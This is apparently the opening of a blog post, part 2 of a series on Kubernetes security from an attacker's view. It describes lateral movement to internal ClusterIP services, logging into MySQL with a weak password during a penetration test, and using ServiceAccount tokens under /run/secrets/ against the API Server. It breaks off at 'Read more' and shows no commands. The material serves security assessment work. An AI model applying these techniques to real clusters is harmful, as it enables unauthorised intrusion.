Viewing K8S Cluster Security from the Perspective of Attackers (Part 2)

The attacker’s perspective on K8S cluster security (Part 1) summarizes the attack methods on K8S components, node external services, business pods, and container escape methods in the K8S cluster, corresponding to attack points. This article will continue to introduce attack points, namely lateral attacks, attacks on the K8S management platform, attacks on image libraries, and attacks on third-party components.

Attack point: Lateral attack Attack other services

There are often some internal services exposed through ClusterIP in the cluster. These services cannot be scanned outside the cluster, but some sensitive services may be found in the internal pod through the information collection method mentioned above, such as by scanning ports. Or look at environment variables etc.

Earlier, we found the address of the mysql service in the environment variables of the target pod during an internal penetration test, as shown in Figure

And successfully logged in to the mysql database by trying a weak password:

Attack API Server

The communication between the pod of the K8S cluster and the API Server is verified by the token of the ServiceAccount. There is an attack point here. If the ServiceAccount of the pod is too large, it can communicate with the API Server with high authority, and it is possible to view some sensitive information of the cluster. Or perform privileged operations or even further control the cluster.

The token is saved in the /run/secrets/ file of the pod by default. In an actual attack, the address of the API Server can generally

Read more

Explore the site

More from the blog

Latest News